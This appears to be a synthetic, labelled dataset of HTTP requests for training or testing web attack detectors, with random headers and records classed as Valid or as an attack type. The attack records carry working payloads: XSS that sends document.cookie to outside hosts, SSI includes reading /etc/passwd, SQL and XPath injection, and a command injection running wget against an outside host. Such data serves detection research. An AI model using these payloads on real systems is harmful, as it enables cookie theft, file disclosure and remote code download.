UA-Pixels: 474x394
Via: dmnaa/6.2 www.eaauhil.html, mny/8.0 241.58.186.24
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 405 60.173.106.50 "flsldMhforut" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fE7urulTloinVe=rs31s&Eprocessing-instructionYpF=538291&hg0nsh=ili' or   count(  path/child::node()[position(   )=((    i  +j    +  k+l  +    1)]     |  path/child::*()[position()=(k+1)])=1  or    'ou'=   '   rno'    or&nEhtenentoau=ht&ttygNiSishsteeb=eaoaky

End - Id: 48608
Start - Id: 47249
class: XSS
GET /2strhuio9utshnplfr/PxCP.x.bin?ct8f9ac=3148719458&ia=rxfA.h6QwRF&leefn=%3Cstyle++++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F114.144.42.53%2Fnsasnt.bin%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&Esslu=ct01dhwsenSe&abetweenWcMbKmO=eecn1&ghedetpsbr=8%29s HTTP/1.1
Host: 96.238.202.175:6
Connection: 0itoW4i
Accept: audio/x-wav;q=0.0, text/html;q=0.3
Accept-Charset: koi8;q=0.4, windows-1257;q=0.7, iso-8859-15;q=0.1, cp-950;q=0.6, x-mac-korean
Accept-Encoding: identity;q=0.5, compress;q=0.6, deflate;q=0.5
Accept-Language: *;q=0.6
Cache-Control: i=Lq2hndn6
Client-ip: 19.118.218.108
Cookie: mtuT2wrtterto=ie
Cookie2: $Version="66"
Date: Tue, 24 Apr 07 06:12:03 UTC
ETag: "WAB5@Z.yDarnU0JFvhk"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 24 Nov 09 19:24:42 CET
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: *
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 57
MIME-Version: 3.6
Pragma: nr='rnffpjly'
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -88
Referer: http://www.tnmtd.biz/1e0a4i5s/crfci3w/gf5ef2.nsf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.3 (compatible; Konqueror/2.3; Linux i386; od6Ehuh; aonkula)
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: 8.8 124.244.194.141
Transfer-Encoding: compress
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47249
Start - Id: 19809
class: Valid
GET /mpsrorIi4ssti3mns/eqcnNrG/aue/ji08z-ydIO3L..b6/unqaNAR/ond/aQiT8V/rdfAeshtslzcgdmmewdf.css?dOjlinkopenOPERP=hscjhahdbpeeDft&hoetweuAenao=3&sbeh=c+e&bIsfn7iieauv=sfam HTTP/1.1
Host: 48.71.1.245
Connection: close
Accept: application/*;q=0.3, audio/*;q=0.7
Accept-Charset: windows-1254, euc-jp;q=0.8, euc-tw;q=0.4
Accept-Encoding: gzip;q=0.9, identity;q=0.7, deflate;q=0.5, deflate
Accept-Language: iaE-nep, zyrycsg4-l;q=0.7
Cache-Control: no-transform
Client-ip: 173.39.57.195
Cookie: UIdivpI6netcatT4D=i4duyWerPubf
Cookie2: $Version="1"
Date: Sun, 18 Jun 06 20:31:13 CET
ETag: "TS2JMorKZGafPwYxG4ru"
Expect: eupddlzx
From: ilotit@a0vnis.fr
If-Modified-Since: Wed, 24 May 06 07:11:19 UTC
If-Unmodified-Since: Fri, 05 Jun 09 19:10:34 CET
If-Match: "5COt1nFlsup458uvOqvK"
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 1.0
Pragma: oceoRfEt=ktp
Proxy-Authorization: Basic c3Q3dGx0OmFpaHBzc3k=
Authorization: Basic Z280cXNodTppc2xvbFNzdg==
Range: 1005-964
Referer: http://www.TSrTpe.uk/UtoryM/496d0e/Wiuk5hta/aenpnoP/zqkR.msf
TE: gzip,trailers
Trailer: Range
User-Agent: Mozilla/0.2 (Machintosh; U; PPC Mac OS X 1.2; Dr-nu; rv:1.6.1) Gecko/56703354
UA-CPU: 68000
UA-Disp: 569,1861,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 003x899
Via: zMie/9.4 61.107.235.242
Transfer-Encoding: compress
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 962 110.175.21.28 "nPnxec" "Mon, 29 Aug 05 22:03:18 UTC"
X-Forwarded-For: 47.57.185.158
X-Serial-Number: 09282554265324
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19809
Start - Id: 40444
class: SSI
GET /mADD/nZioNtm3bj8Et.jpeg?I4tmi=35396&eectb517rk1uoes=xAarlogaeEn&fbTao=ed2hw&0tyo=ne8c%3B%3Dayj&EjdropT_9G=adV.wnsuyI0N&aSIerrEbpn=%3C%21--%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E HTTP/1.1
Host: www.GnetE.fr
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987, x-mac-chinesesimp;q=0.9, x-mac-japanese
Accept-Encoding: identity;q=0.0, identity;q=0.0, identity
Accept-Language: worty-rcu;q=0.4, rfoar-3lsate;q=0.6
Cache-Control: min-fresh=8685
Client-ip: 128.123.101.76
Cookie: ikry71rli=peoma3eEcf4leb
Cookie2: $Version="879"
Date: Wed, 05 Nov 08 12:42:30 UTC
ETag: W/"w_7cEQg3_Tkt1w70Xs"
Expect: 100-continue
If-Unmodified-Since: Wed, 15 Nov 06 03:21:44 GMT
If-None-Match: "@EO4WXr6dVVvBAVQgOF"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 3973
MIME-Version: 3.0
Pragma: atx='wnt5'
Proxy-Authorization: rwn3u idctraIi=sRc7
Authorization: Digest nonce
Range: 53605-7014
Referer: /u8swa.asmx
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: czZ6UA-J http://www.irwshD.net
UA-CPU: x86
UA-OS: Windows 95
UA-Color: color8
Via: HTTP/8.5 237.208.218.3:41
Transfer-Encoding: identity
Upgrade: heue/0.3, feul/2.9, rit/2.6
Warning: 424 www.ivstiAcN.shtml "Koasse" 
X-Forwarded-For: 211.36.21.124

null

End - Id: 40444
Start - Id: 31097
class: Valid
GET /kL8Z21S/rtsnietnrnQJtqlT/ok0KO2n/osdcLvpOY67CychildS/erenrflagt8/aeahlm.swf? HTTP/1.1
Host: 127.121.226.214
Connection: dryy
Accept: text/xml, text/plain, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 11.133.74.44
Cookie: ou8onnAoc3= ansasidme;Zi53Lodx-rvcmd=jtkdeueU;wdiba8ntb0h=inaRreT;nnEfzoeaot=r$ bodysBwzs : qn;onPsViona=30053048;unl8mgarcasaont='Uojxp_?d texecee
Cookie2: $Version="015"
Date: Sat, 15 May 04 16:51:39 GMT
ETag: "JZltN_MPvZsZvd9"
Expect: 100-continue
From: on158@eef4s.gov
If-Modified-Since: Tue, 21 Feb 06 04:57:35 CET
If-Unmodified-Since: Thu, 13 Mar 08 16:48:07 CET
If-Match: *
If-None-Match: "DaFMUWAlXEuZJ1pPj3"
If-Range: "L187KFjl.oF.tcUJ."
Max-Forwards: 531
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: Basic NnRhZWtlaWk6ZXRwMg==
Range: 0945-
Referer: /oro5y2cE/gsnnopn/es3m1/xTfc.mpeg
TE: trailers,deflate;q=0.6,trailers
Trailer: TE
User-Agent: Mozilla/4.5 (X11; U; Solaris 5.5; uE-so; rv:3.9.0) Gecko/75133251
UA-CPU: PowerPC
UA-Disp: 334,6065,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1573x3760
Via: HTTP/1.0 www.ngy34ls.tiff, 7.3 www.lkhiu.css:134, HTTP/6.5 www.iVu9.gif
Transfer-Encoding: gzip
Upgrade: Vpd/5.7, eiJ/4.6, lehe/1.0
Warning: 311 221.48.91.250:29839 "hOdjuaaVchtteasa" "Thu, 31 Jan 08 03:52:06 UTC"
X-Forwarded-For: 80.59.235.174
X-Serial-Number: 30237694505
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31097
Start - Id: 2254
class: Valid
GET /zdmTWg2vDdA/rFvoYiUUy536/emsyFIGAUw1oHyreeDSX/necrud1shD1g8v/iYlhczayW.Wn.dll?SU2CTXsLdj=iojplz+iahcyrC HTTP/1.0
Host: 21.235.230.54
Connection: keep-alive
Accept: audio/x-wav, image/jpeg, image/*;q=0.3
Accept-Charset: iso-2022-jp;q=0.4, iso-10646-ucs-2, iso-8859-7
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 193.18.231.129
Cookie: ss=o;eTE=atndyhea<
Cookie2: $Version="557"
Date: Tue, 21 Oct 08 10:17:30 GMT
ETag: W/"tjqftY-jdCxUK1bXKpw"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Sun, 07 Mar 10 01:43:45 UTC
If-Unmodified-Since: Thu, 17 Mar 05 04:10:58 UTC
If-Match: *
If-None-Match: "tf75mJ2VhY8oJf8"
If-Range: "r5515r84FqOfsS0FwI"
Max-Forwards: 5
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest username="hheA"
Authorization: Basic ZGVzaWZzbTp3Y1JocHJtTg==
Range: 98793-,-49003,-71607
Referer: /iiac/qrtn/Iuir.gif
TE: trailers
Trailer: Host
User-Agent: Tpi1se/9.7
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2256x733
Via: 4.9 www.malw.shtml:50993
Transfer-Encoding: compress
Upgrade: l6b/8.2, ddjs/1.0, EPneim/9.5, cHY/2.6
Warning: 141 102.221.143.25:60740 "vgrreunklthugbStknar" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 61486796053346804
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2254
Start - Id: 42227
class: SqlInjection
GET /ngooak/aahaueslpasdig.msf?nottaieDttd69=ids+1eqmo%7EOva&nsxx=jfvP&riNtdn=%27%3B++insert+++++into+++++ad9Eh+values%28666%2C%27lw%27%2C%27biTe%27%2C0xfffff%29&nayoaNUhs9i=00&dxiphgd4euQe=jaitiZaume5edvi4Te HTTP/1.1
Host: www.eeteTrlmM.it
Connection: ceee
Accept: application/*, text/xml;q=0.4, audio/basic;q=0.1
Accept-Charset: iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: nwxthhped32=918412034;wa41.Zzy5_K=992411;XE0b=86884;ruee=E'eCe
Cookie2: $Version="303"
Date: Sat, 09 Apr 05 08:27:47 GMT
ETag: W/"sIriMAl4WPniCIC"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Fri, 10 Feb 06 01:18:16 UTC
If-Unmodified-Since: Mon, 13 Sep 04 12:10:42 UTC
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: "pv@qrWadt1tIHUizA"
Max-Forwards: 7106
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic eXJoZTc6dEVpZXQ=
Authorization: Basic UnRvZG9ubzplbGVvMTV4
Range: 498-82346
Referer: http://www.vhreetns.biz/thetwk/4fdBrsR.nsf
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/2.1 (compatible; Konqueror/9.3; SunOS sun4u; ltnNeToIc; bemkliint)
UA-CPU: x86
UA-Disp: 4436,548,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 5.9 www.EorOa7.css
Transfer-Encoding: eiqbe; sAwm=flea0w9
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42227
Start - Id: 35611
class: XPathInjection
GET /1CN2sA6MB/96fdUVWgy.ygE/yitheoa/kgwindow.open88TX5perl/_EKrMtnph-NvuCautoexecnph-/aCY-he-/nusJglQDn/tixrmI2/caN-Ej1MXl6Y6/swgb_/yX6B-ALRQIb/eWyU.nsf?ahotdxedn=nSne%2Fb%2FkYc7Oc%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D+++++or+++%27Lr%27+%3D%27&dor=%3Cd8O+eKd+hsd HTTP/1.1
Host: www.ae7gvHe.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Cf-Qn;q=0.1, sewem4e-gwgtr
Cache-Control: min-fresh=6799
Client-ip: 117.110.178.233
Cookie: afTm=62;aetsrhef04=tVQEw-HML;teea=e4Doj5C1FvKo;So-p=8gEfg0ae;mksbjc7DSw=eat;it;rumsnes5o5ers=pM8
Cookie2: $Version="102"
Date: Tue, 12 Jan 10 07:12:18 CET
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: mt02@Hkilog0Etd.org
If-Modified-Since: Sun, 30 Apr 06 07:14:43 UTC
If-Unmodified-Since: Sun, 21 May 06 23:44:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Dec 05 05:57:20 CET
Max-Forwards: 867
MIME-Version: 4.8
Pragma: 1=Uampieam
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: Digest nonce
Range: -5254
Referer: http://www.pr8ziyia.net/mfll/rcuo.php4
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.0 (compatible; MSIE 9.4; Win98; ywijaha; 2ntaIe)
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x439
Via: 3.2 www.shu3.tiff, 3.2 77.225.162.4:7981
Transfer-Encoding: gzip
Upgrade: sivn/3.0
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 28.16.209.118
X-Serial-Number: 65275952070459353
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35611
Start - Id: 2415
class: Valid
GET /aFFPwsfb6/Ded/geetDktOU6oK4K2/aJ4WgFW9iyBBc_N3/eZw/eiBvOkZK4/eSZGIb_HTac/aO0oyhDyEvo_PHkTX.o/kOrzyebdle/ms/rvdtbDz-EWZfuG2.asp?giinsertDXbody=n_i5WE4l&titbeNwbJ=+AsS&dsus=tsyys&1itlayu2oen=lio HTTP/1.0
Host: 244.122.194.171
Connection: nsmnwist
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.0, compress
Accept-Language: zc-kzoae9cl
Cache-Control: max-age=20
Client-ip: 216.140.72.166
Cookie: dne8uwas=4293;he=31887763;eze=n2f>)is8ebo-eqco0d:e;iAeh3oits8ridu=pp2oTnxtermte
Cookie2: $Version="1"
Date: Thu, 01 Jan 09 13:18:03 GMT
ETag: W/"h6BO4lSOeHIukUAXMVV"
Expect: 100-continue
From: 0talRina@qieneot.fr
If-Modified-Since: Wed, 07 Apr 10 05:23:26 CET
If-Unmodified-Since: Sat, 09 Oct 04 14:55:04 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Feb 04 05:37:32 GMT
Max-Forwards: 90
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bXZuNkV0cmI6cmF1b2VyZWU=
Authorization: Basic d05lZTppZGF0Vg==
Range: 69893-,12785-855,77-
Referer: http://www.9dmmioo.st/hhpf.pdf
TE: chunked
Trailer: User-Agent
User-Agent: swodUmLt (e5r-29_GR; dHSCadN; e9.Mr87UtP; t7A2Ub)
UA-CPU: Sparc
UA-Disp: 5566,8703,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 213x610
Via: FTP/7.2 www.fesNea.html
Transfer-Encoding: soeixn; eIsjofOi=e4kt7gmc
Upgrade: hikle/8.3, vhr/8.6, eWn/8.8, T5wt/3.1
Warning: 492 www.astoe3u.js "irotdAesefitoeiuos" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 222850324123398
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2415
Start - Id: 43453
class: OsCommanding
GET /zDXrtVHptq77xYt/nIKR.linO2yIVyjN5zs/nLHL6Ar2AkEIjoS4NWw/mqIW/dqethmtHenrxucd/ehE/6A9passthruexecFZI-oLXwM/oi/gqVRdeB/hwym.mdb?esunnye=%22%3B+++++%2Fusr%2Fbin%2Fwget+www.trnsal.com%2Fitgeis+++++%3B&ntmkm=trDrti&JnkIL=27173066&oiqt0eh9=n+4a%3Fts7tera&f2kVR6Dgzireplace=aia&fisZf=8216659&opshUedd5it=2&ftphttpsiLH4rmTU=FhqAoo8+8&-@67=1tt+servicesIidib HTTP/1.1
Host: 183.48.13.208:477
Connection: ez5tm
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish;q=0.5, cp-950;q=0.8, cp-950, windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: 3-siotel, gtpna-moqm
Cache-Control: max-age=00
Client-ip: 106.211.70.62
Cookie: rrTearfmeeeo=zs?x;xYOXp=oet&cvard%ctbpel
Cookie2: $Version="5"
Date: Sun, 06 Jun 04 02:29:05 GMT
ETag: W/"KC8c4oPy9Q8-AacFtL"
Expect: 100-continue
From: epsEeMfq@8rnt5E1rt.ch
If-Modified-Since: Mon, 06 Sep 04 12:19:30 GMT
If-Unmodified-Since: Mon, 09 Jul 07 17:35:30 GMT
If-Match: "V7wcSN_i8QuCP19De"
If-None-Match: *
If-Range: Mon, 29 Sep 08 03:12:51 CET
Max-Forwards: 49
MIME-Version: 4.0
Pragma: 3at=jrbt5le
Proxy-Authorization: Digest nc=19e24fDE
Authorization: ryOr5p lbIrneba=8rs6eky
Range: -0418,311-
Referer: http://www.dLho.uk/fob1wt/et2t/sds6smpn.asmx
TE: chunked,deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: ohtahr (sNgp1Dd; eUI83apV; eRf8IB; tbWv5wS_sh; epp91SrI)
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 8.5 67.0.125.165, eeeJ2/6.1 www.En8tecn.css:9653, ismo/9.7 www.EmrsnYf.gif
Transfer-Encoding: gzip
Upgrade: s2or1r/5.6, unus/0.2, iUp/7.1
Warning: 854 www.dmgmntsM.css "es0e0ne4" "Sat, 04 Oct 08 20:47:43 GMT"
X-Forwarded-For: 52.147.136.153
X-Serial-Number: 6389535154069770077
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43453
Start - Id: 47744
class: XSS
GET /49ep6@25DdAmExUa/aHoq/fa7ahaialHarensos/u2Jncz86lBrcpH7q1.exe?saanwtmer8nn=77546483&nn4st=y.q&Ta28rOI6UNA=gb33v1AHxZuG&divc6iframe5=a2MT&easte8laezet=v%3Dnu&ecaathwswkhDsi=%5Dlo3a%7E&@OLtO=29627&nivpK=369603&obene8tzhiQt=60172778&96t5aninottl=tzh+tpl%3A&toaiOm=%3Cmeta++http-equiv++%3D+++%22refresh+%22++content++%3D%22+++++0%3Burl%3Djavascript%3A+++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.teerornd.com%2Fcgi-bin%2Flaalriietr.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&QooI7=oj5hms%2Bal&riiattw=maccess_logDiPtth%7C HTTP/1.0
Host: www.nyode1lbo.biz
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, koi8-r;q=0.7, koi8-r;q=0.6, iso-8859-3, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 58.135.32.75
Cookie: RCoptNuR=n4q_w-jT8;XmnzN1N.netcatPG=iTELdt1LeK
Cookie2: $Version="00"
Date: Fri, 24 Jul 09 09:01:43 GMT
ETag: "7talGQPBsmJ_AaAgn"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Sun, 25 Jan 04 18:37:01 UTC
If-Unmodified-Since: Wed, 18 Nov 09 23:33:03 UTC
If-Match: *
If-None-Match: "SsWaTrNxWk42BiGRZEf"
If-Range: ".QYT6A-MEQgvso.i_IjW"
Max-Forwards: 9
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic czZVbmRodDphdW5zdG9u
Authorization: NTLM b203c214d2FpdGE1ZWY2dE5ybHMxYWZjQzFlbXVlbm9zcmpwbnk=
Range: -887125,6715-3229
Referer: http://7a8d9v.ch/tcnoiirt/lxasErid.cfm
TE: trailers,gzip,trailers
Trailer: Date
User-Agent: cthdiw/3.3.1
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: re7he/5.9 www.enoCin.jpg:3
Transfer-Encoding: deflate
Upgrade: stt/3.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47744
Start - Id: 12235
class: Valid
GET /Alr2de0orlair/i9utoei2taxeeam/ooowetyanyu04/Waoa_FOp/ma/sbaecasnnwkom5cmhen.js?oe=5486909&e2ias58=es9osuoysnrt&5f7EbetweenWQbetweenK09=42258&yl6h3ooyhd=4re&be7EepiTd=1284574&ootc9to03=iB1etrto HTTP/1.0
Host: 111.19.116.73
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: x-mac-turkish, windows-1250;q=0.8, x-mac-japanese;q=0.6, x-mac-cyrillic
Accept-Encoding: deflate;q=0.2, compress;q=0.2, identity;q=0.7, deflate, deflate;q=0.1
Accept-Language: vytT-ersv7cs;q=0.6
Cache-Control: Ehf='e'
Client-ip: 218.85.114.86
Cookie: 99IH=ntrtttn27nmdmnlec
Cookie2: $Version="3"
Date: Thu, 01 Jun 06 15:05:35 UTC
ETag: W/"b6Wv1SJd-ZDUHZE"
Expect: 100-continue
From: msaq@tanxaosh5.ch
If-Modified-Since: Sat, 30 Jul 05 18:52:51 UTC
If-Unmodified-Since: Sun, 29 Jul 07 20:03:15 GMT
If-Match: "aPW0.pmxIkhC5k7@a"
If-None-Match: "vyZly1b-ECvQW4jhvZ"
If-Range: Thu, 09 Apr 09 10:57:57 UTC
Max-Forwards: 1505
MIME-Version: 1.6
Pragma: sd='gtnIn'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest response="285a4E608D4F9000A3bca4bd9D37CE15"
Range: 7235-,-720750
Referer: /7stfe.png
TE: trailers,gzip;q=0.4
Trailer: Expect
User-Agent: lcleajyOg/9.5.6
UA-CPU: MIPS
UA-Disp: 2190,4880,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5966x0080
Via: 8.4 www.m2lt2.jpg:25, 0.0 197.125.41.216
Transfer-Encoding: compress
Upgrade: xnhun/4.7, foajfe/4.9, tiTnoe/9.3, sHsmu/7.7
Warning: 176 125.171.28.119 "rAswf" "Thu, 16 Oct 08 01:05:52 GMT"
X-Forwarded-For: 60.209.14.143
X-Serial-Number: 8899123917889
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12235
Start - Id: 6783
class: Valid
PUT /o9c4hafaftgita/a4e/wnboot.ini7evnc/ek10UNbznzeX1xMEUP/nlIukrseahssiefnmR/rn.TR2/OHpperl6Fwi6AqY/S24foeotcpn4/7lmePTIs.shtml? HTTP/1.1
Content-Length: 168
Content-Language: easa4Tc
Content-Encoding: compress
Content-Location: /olmla/e1tP/PEnoyRnT/leqtrU.png
Content-MD5: ckFyZXN1bjIyZWZmMFNlZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Sep 09 14:12:42 CET
Last-Modified: Wed, 19 Sep 07 23:18:24 CET
Host: 9.251.38.32
Connection: close
Accept: image/*, application/x-tar
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, identity;q=0.3
Accept-Language: 6denu-bjnH7Het;q=0.1
Cache-Control: only-if-cached
Client-ip: 181.153.33.99
Cookie: 2iw1GS=hC7gcRKUq;muere=)uthlshy;4?;b12oekornpie= nOphp5g:(ze sooedn:
Cookie2: $Version="6"
Date: Wed, 05 Jul 06 08:35:04 UTC
ETag: "LpeVDltSXUkKRJy8A"
Expect: 100-continue
From: ooti@eeee.gov
If-Modified-Since: Tue, 23 Dec 08 10:27:33 UTC
If-Unmodified-Since: Thu, 03 Dec 09 10:04:09 GMT
If-Match: *
If-None-Match: "fLZ3wdECIY-0PcH2"
If-Range: "LfsB2g_PYkkyJwD"
Max-Forwards: 88
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: 3ptg ojj0e=tta6i
Authorization: NTLM NmNmVHlnZGFzZW50Y2hub2g5dWVuZW50b2lydHNybGF0ZQ==
Range: -8361
Referer: http://eynRa.ch/lbsc/3bjbse/14wsTthe/diCa.mpg
TE: gzip
Trailer: Expect
User-Agent: dDl3qQ http://www.htr9c.it
UA-CPU: 68000
UA-Disp: 610,0382,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 037x6645
Via: HTTP/2.8 www.exe9.shtml
Transfer-Encoding: deflate
Upgrade: 8tEuth/3.6, 0ndlte/6.2, lnc/7.9, e08/7.6
Warning: 838 219.131.212.151 "ia7ddEnaOtolahvi" "Mon, 09 May 05 12:39:18 UTC"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 5910384052
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yrermoad4tre=5aaevrmehhetcti&ioE0e=geTi&oey=cU_FK7YW@&embB=cftXg2&S2Dy=gQx.eNVGsIz&vs9=370018310&n742l38F=d9m3t6&e9=4&iglnnoe=ps9isbognolon&dfOXpassthrudivopt-=erctHe

End - Id: 6783
Start - Id: 39723
class: SSI
GET /gj6z4ajC3d35u_xIzYN/fOU5D/hahhenwseswhn/5heetX0eennnd/ecTxott6d2m1tv/d6siwNotugAxMe/cES1G385Cou.jpg?tAfeHi=%3C%21--+%23include++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&Vat=uPMc&Etu0Htoyaeod9=eenhn6o3motG8ir&CojVZorny=5df7lSV&fzsidoxhae=8bl&yrrod=0dtt65a74ftid%25oE0e&9atTioIt3hie6er=-ou&txlYnrlE4qwio=1VekL9&7b=19&aio8ecnhhc1v=047500386 HTTP/1.0
Host: www.sMeo.org
Connection: close
Accept: application/zip
Accept-Charset: *;q=0.7
Accept-Encoding: identity, compress;q=0.2, identity;q=0.1, deflate;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 55.223.250.116
Cookie: eqsL=dHqADb;eelnvheasST=)cshutdown;te=5;ru8D3daemjt=sni;l
Cookie2: $Version="346"
Date: Thu, 03 Apr 08 10:09:18 CET
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Tue, 23 Aug 05 15:39:37 UTC
If-Unmodified-Since: Sun, 21 Jun 09 03:44:38 GMT
If-Match: "OYBriI2wnOBw8UzR"
If-None-Match: *
If-Range: Sun, 23 Jul 06 14:20:41 CET
Max-Forwards: 327
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: Digest algorithm=nesB0A
Range: -58,-7,-12255
Referer: http://8ust5elt.biz/nawe/kxebaqOo.rar
TE: trailers,gzip,chunked;q=0.3
Trailer: Host
User-Agent: wehO1rensls8lyoi
UA-CPU: x86
UA-Disp: 035,2744,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 066x3039
Via: htcial/8.9 www.womjiISd.js, HTTP/4.2 www.eheex.jpeg
Transfer-Encoding: identity
Upgrade: asg/6.6, aeyyeD/5.2, eeae/5.5, sfi/1.0
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 9911764547155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39723
Start - Id: 17273
class: Valid
GET /slqkenZ-6/ii3/wO8/eFjWYvx/oevMZaG4DO7lvG/gta.aspx?yadtEOce=rcOiho6eet&gnn1see35o9i2=473998594&HUGJ9B2=an HTTP/1.0
Host: www.tHynope.fr:01610
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1253, iso-8859-8-i;q=0.1, koi8, utf-8
Accept-Encoding: *
Accept-Language: heil-t9aavEti;q=0.6
Cache-Control: ee='h'
Client-ip: 68.43.213.56
